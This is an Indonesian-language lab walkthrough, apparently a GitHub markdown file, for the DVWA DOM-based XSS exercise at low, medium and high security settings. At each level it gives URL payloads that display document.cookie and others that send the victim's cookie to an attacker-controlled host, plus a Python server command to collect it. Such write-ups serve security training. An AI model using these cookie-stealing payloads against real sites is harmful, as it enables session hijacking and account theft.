XSS (DOM)

DOM based XSS muncul ketika Javascript mengambil data dari sumber yang dapat dikontrol oleh penyerang misalnya seperti URL, yang memungkinkan penyerang mengeksekusi code JavaScript yang berbahaya dan membajak akun pengguna lain.

Security Low

Menampilkan cookie halaman

http://<IP_Server>/DVWA/vulnerabilities/xss_d/?default=<script>alert(document.cookie);</script>

Membuat halaman untuk menampung cookie

python3 -m http.server 80

Melakukan pencurian cookie dan kirim ke halaman penampung

http://<IP_Server>/DVWA/vulnerabilities/xss_d/?default=<script>window.location='http://<IP_Attacker>/?cookie='+document.cookie</script>

Security Medium

Menampilkan cookie halaman

http://<IP_Server>/DVWA/vulnerabilities/xss_d/?default=English</select><img src/onerror=alert(document.cookie)>

Melakukan pencurian cookie dan kirim ke halaman penampung

http://<IP_Server>/DVWA/vulnerabilities/xss_d/?default=English</select><img src/onerror=window.location='http://<IP_Attacker>/?cookie='+document.cookie>

Security High

Menampilkan cookie halaman

http://<IP_Server>/DVWA/vulnerabilities/xss_d/#?default=<script>alert(document.cookie);</script>

Melakukan pencurian cookie dan kirim ke halaman penampung

http://<IP_Server>/DVWA/vulnerabilities/xss_d/#?default=<script>window.location='http://<IP_Attacker>/?cookie='+document.cookie</script>

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

XSS (DOM).md

XSS (DOM).md

XSS (DOM)

Security Low

Security Medium

Security High

Files

XSS (DOM).md

Latest commit

History

XSS (DOM).md

File metadata and controls

XSS (DOM)

Security Low

Security Medium

Security High